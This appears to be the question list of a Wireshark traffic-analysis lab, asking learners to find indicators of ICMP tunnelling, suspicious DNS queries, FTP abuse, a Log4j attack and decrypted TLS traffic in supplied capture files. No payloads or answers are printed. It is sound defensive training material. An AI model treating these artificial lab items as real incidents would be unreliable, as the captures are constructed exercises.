Which host requested the IP address “172.16.13.85”?

Use the “Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap” file.
What is the IP address of the user “u5”? (Enter the address in defanged format.)

What is the hostname of the available host in the Kerberos packets?

Use the “Desktop/exercise-pcaps/dns-icmp/icmp-tunnel.pcap” file.
Investigate the anomalous packets. Which protocol is used in ICMP tunnelling?

Use the “Desktop/exercise-pcaps/dns-icmp/dns.pcap” file.
Investigate the anomalous packets. What is the suspicious main domain address that receives anomalous DNS queries? (Enter the address in defanged format.)

Use the “Desktop/exercise-pcaps/ftp/ftp.pcap” file.
How many incorrect login attempts are there?

What is the size of the file accessed by the “ftp” account?

The adversary uploaded a document to the FTP server. What is the filename?

The adversary tried to assign special flags to change the executing permissions of the uploaded file. What is the command used by the adversary?

Use the “Desktop/exercise-pcaps/http/user-agent.cap” file.
Investigate the user agents. What is the number of anomalous “user-agent” types?

What is the packet number with a subtle spelling difference in the user agent field?

Use the “Desktop/exercise-pcaps/http/http.pcapng” file.
Locate the “Log4j” attack starting phase. What is the packet number?

Locate the “Log4j” attack starting phase and decode the base64 command. What is the IP address contacted by the adversary? (Enter the address in defanged format and exclude “{}”.)

Use the “Desktop/exercise-pcaps/https/Exercise.pcap” file.
What is the frame number of the “Client Hello” message sent to “accounts.google.com”?

Decrypt the traffic with the “KeysLogFile.txt” file. What is the number of HTTP2 packets?

Go to Frame 322. What is the authority header of the HTTP2 packet? (Enter the address in defanged format.)

Investigate the decrypted packets and find the flag! What is the flag?

Use the “Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap” file.
What is the packet number of the credentials using “HTTP Basic Auth”?

What is the packet number where “empty password” was submitted?

Use the “Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap” file.
Select packet number 99. Create a rule for “IPFirewall (ipfw)”. What is the rule for “denying source IPv4 address”?

Select packet number 231. Create “IPFirewall” rules. What is the rule for “allowing destination MAC address”?

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
